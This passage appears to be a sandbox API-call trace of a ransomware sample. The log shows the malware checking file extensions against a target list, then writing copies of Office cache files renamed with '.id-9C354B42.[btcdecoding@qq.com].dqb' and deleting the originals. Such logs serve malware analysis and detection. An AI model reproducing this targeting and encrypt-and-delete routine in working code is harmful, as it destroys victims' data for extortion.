(lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString=".doc") returned 4 [0034.706] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".docx") returned 5 [0034.706] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.706] lstrlenW (lpString=".pdf") returned 4 [0034.706] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString=".xls") returned 4 [0034.707] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString=".xlsx") returned 5 [0034.707] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.707] lstrlenW (lpString=".ppt") returned 4 [0034.707] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.707] lstrlenW (lpString=".zip") returned 4 [0034.707] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.707] lstrlenW (lpString=".rar") returned 4 [0034.707] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString=".bz2") returned 4 [0034.707] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString=".7z") returned 3 [0034.707] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.707] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.707] lstrlenW (lpString=".dbf") returned 4 [0034.707] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.707] lstrlenW (lpString=".1cd") returned 4 [0034.707] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.707] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.707] lstrlenW (lpString=".jpg") returned 4 [0034.707] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.707] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.707] lstrlenW (lpString="Setup.xml") returned 9 [0034.707] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.708] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2362) returned 1 [0034.708] CloseHandle (hObject=0x1a4) returned 1 [0034.708] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.708] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.708] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.708] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.708] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.708] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.708] GetLastError () returned 0x0 [0034.708] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x93a, lpOverlapped=0x0) returned 1 [0034.710] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x940, lpOverlapped=0x0) returned 1 [0034.711] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.711] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.711] SetEndOfFile (hFile=0x1a0) returned 1 [0034.711] CloseHandle (hObject=0x1a0) returned 1 [0034.711] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.711] SetEndOfFile (hFile=0x1a4) returned 1 [0034.712] CloseHandle (hObject=0x1a4) returned 1 [0034.712] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.712] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString=".doc") returned 4 [0034.713] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString=".docx") returned 5 [0034.713] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.713] lstrlenW (lpString=".pdf") returned 4 [0034.713] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString=".xls") returned 4 [0034.713] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString=".xlsx") returned 5 [0034.713] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.713] lstrlenW (lpString=".ppt") returned 4 [0034.713] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString=".zip") returned 4 [0034.713] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.713] lstrlenW (lpString=".rar") returned 4 [0034.713] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString=".bz2") returned 4 [0034.713] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString=".7z") returned 3 [0034.713] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString=".dbf") returned 4 [0034.713] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString=".1cd") returned 4 [0034.713] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.713] lstrlenW (lpString=".jpg") returned 4 [0034.713] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString=".doc") returned 4 [0034.714] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString=".docx") returned 5 [0034.714] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.714] lstrlenW (lpString=".pdf") returned 4 [0034.714] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString=".xls") returned 4 [0034.714] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString=".xlsx") returned 5 [0034.714] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.714] lstrlenW (lpString=".ppt") returned 4 [0034.714] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString=".zip") returned 4 [0034.714] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.714] lstrlenW (lpString=".rar") returned 4 [0034.714] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString=".bz2") returned 4 [0034.714] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString=".7z") returned 3 [0034.714] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString=".dbf") returned 4 [0034.714] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString=".1cd") returned 4 [0034.714] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.714] lstrlenW (lpString=".jpg") returned 4 [0034.714] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.714] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.714] lstrlenW (lpString="InfoPathMUI.xml") returned 15 [0034.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.715] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1231) returned 1 [0034.715] CloseHandle (hObject=0x1a4) returned 1 [0034.715] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0034.715] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.715] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.716] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.716] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.716] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.716] GetLastError () returned 0x0 [0034.716] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0034.717] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0034.723] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.723] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.723] SetEndOfFile (hFile=0x1a0) returned 1 [0034.723] CloseHandle (hObject=0x1a0) returned 1 [0034.724] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.724] SetEndOfFile (hFile=0x1a4) returned 1 [0034.725] CloseHandle (hObject=0x1a4) returned 1 [0034.725] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.725] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0034.725] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.725] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.725] lstrlenW (lpString=".doc") returned 4 [0034.725] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.725] lstrlenW (lpString=".docx") returned 5 [0034.725] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.725] lstrlenW (lpString=".pdf") returned 4 [0034.725] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.725] lstrlenW (lpString=".xls") returned 4 [0034.726] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".xlsx") returned 5 [0034.726] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.726] lstrlenW (lpString=".ppt") returned 4 [0034.726] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString=".zip") returned 4 [0034.726] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.726] lstrlenW (lpString=".rar") returned 4 [0034.726] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".bz2") returned 4 [0034.726] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".7z") returned 3 [0034.726] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString=".dbf") returned 4 [0034.726] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString=".1cd") returned 4 [0034.726] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString=".jpg") returned 4 [0034.726] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.726] lstrlenW (lpString=".doc") returned 4 [0034.726] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".docx") returned 5 [0034.726] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.726] lstrlenW (lpString=".pdf") returned 4 [0034.726] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".xls") returned 4 [0034.726] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString=".xlsx") returned 5 [0034.726] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.726] lstrlenW (lpString=".ppt") returned 4 [0034.726] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.727] lstrlenW (lpString=".zip") returned 4 [0034.727] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.727] lstrlenW (lpString=".rar") returned 4 [0034.727] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString=".bz2") returned 4 [0034.727] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString=".7z") returned 3 [0034.727] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.727] lstrlenW (lpString=".dbf") returned 4 [0034.727] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.727] lstrlenW (lpString=".1cd") returned 4 [0034.727] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.727] lstrlenW (lpString=".jpg") returned 4 [0034.727] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.727] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.727] lstrlenW (lpString="Setup.xml") returned 9 [0034.727] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.727] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1852) returned 1 [0034.727] CloseHandle (hObject=0x1a4) returned 1 [0034.727] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.728] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.728] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.728] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.728] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.728] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.728] GetLastError () returned 0x0 [0034.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x73c, lpOverlapped=0x0) returned 1 [0034.729] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x740, lpOverlapped=0x0) returned 1 [0034.730] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.730] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.730] SetEndOfFile (hFile=0x1a0) returned 1 [0034.731] CloseHandle (hObject=0x1a0) returned 1 [0034.731] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.731] SetEndOfFile (hFile=0x1a4) returned 1 [0034.732] CloseHandle (hObject=0x1a4) returned 1 [0034.732] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.732] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.732] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.732] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.732] lstrlenW (lpString=".doc") returned 4 [0034.732] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.732] lstrlenW (lpString=".docx") returned 5 [0034.732] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.732] lstrlenW (lpString=".pdf") returned 4 [0034.732] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString=".xls") returned 4 [0034.733] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString=".xlsx") returned 5 [0034.733] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.733] lstrlenW (lpString=".ppt") returned 4 [0034.733] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.733] lstrlenW (lpString=".zip") returned 4 [0034.733] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.733] lstrlenW (lpString=".rar") returned 4 [0034.733] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString=".bz2") returned 4 [0034.733] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString=".7z") returned 3 [0034.733] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.733] lstrlenW (lpString=".dbf") returned 4 [0034.733] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") 